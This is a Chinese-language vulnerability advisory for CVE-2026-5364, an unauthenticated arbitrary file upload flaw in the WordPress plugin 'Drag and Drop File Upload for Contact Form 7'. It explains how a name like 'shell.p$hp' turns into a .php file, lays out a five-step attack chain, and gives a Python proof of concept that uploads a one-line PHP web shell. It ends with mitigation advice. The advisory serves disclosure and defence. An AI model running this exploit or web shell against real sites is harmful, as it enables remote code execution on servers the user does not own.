CVE-2026-5364 CVSS 8.1 高危

CVE-2026-5364 WordPress插件任意文件上传漏洞

披露日期: 2026-04-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5364

漏洞类型

任意文件上传

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Drag and Drop File Upload for Contact Form 7

漏洞概述

WordPress插件“Drag and Drop File Upload for Contact Form 7”在1.1.3及以下版本中存在任意文件上传漏洞。由于插件在清理前提取文件扩展名，且允许攻击者控制文件类型参数，导致验证逻辑存在缺陷。攻击者可利用此漏洞上传任意PHP文件以实现远程代码执行，但受.htaccess文件和文件名随机化机制限制，实际利用难度较高。

技术细节

该漏洞源于插件在处理文件上传时的逻辑缺陷。插件首先提取文件扩展名，但在验证阶段检查的是未清理的扩展名，而保存文件时使用的是清理后的扩展名。攻击者可以通过控制请求参数中的文件类型，并构造包含特殊字符（如'$'）的文件名（例如shell.p$hp）。在文件保存过程中，清理机制会移除'$'字符，导致文件扩展名变为.php。虽然插件利用.htaccess文件和文件名随机化来防止直接访问上传的文件，但在某些服务器配置下或如果.htaccess被绕过，未经身份验证的攻击者仍可能成功上传并执行恶意PHP代码，从而获取服务器权限。

攻击链分析

STEP 1

侦察

攻击者识别目标WordPress站点使用了Drag and Drop File Upload for Contact Form 7插件，且版本低于等于1.1.3。

STEP 2

准备

攻击者构造恶意PHP文件，并将其重命名为包含特殊字符的形式（例如evil.p$hp），利用插件清理逻辑中的漏洞。

STEP 3

上传

攻击者向插件的后端接口发送POST请求，上传恶意文件，并绕过验证机制。

STEP 4

处理

服务器接收文件，在保存时剥离特殊字符'$'，将文件扩展名还原为.php，并保存到服务器目录。

STEP 5

执行

攻击者尝试访问上传的文件路径。若成功绕过.htaccess限制，将在服务器端执行恶意PHP代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(url):
    upload_url = f"{url}/wp-content/plugins/drag-and-drop-file-upload-for-contact-form-7/backend/index.php"
    
    # Payload: The '$' character will be stripped during sanitization, resulting in a .php file
    files = {
        'file': ('shell.p$hp', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream')
    }
    
    # Attacker controlled type parameter
    data = {
        'type': 'image/php'
    }
    
    try:
        response = requests.post(upload_url, files=files, data=data)
        if response.status_code == 200:
            print("[+] Upload successful. Check the upload directory.")
            print(f"[+] Response: {response.text}")
        else:
            print("[-] Upload failed.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://example.com"
    exploit(target)

影响范围

Drag and Drop File Upload for Contact Form 7 <= 1.1.3

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用该插件。同时，应通过Web服务器配置（如Apache的.htaccess或Nginx配置）严格禁止在/wp-content/uploads/等目录下解析PHP文件，确保即使文件上传成功也无法被执行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表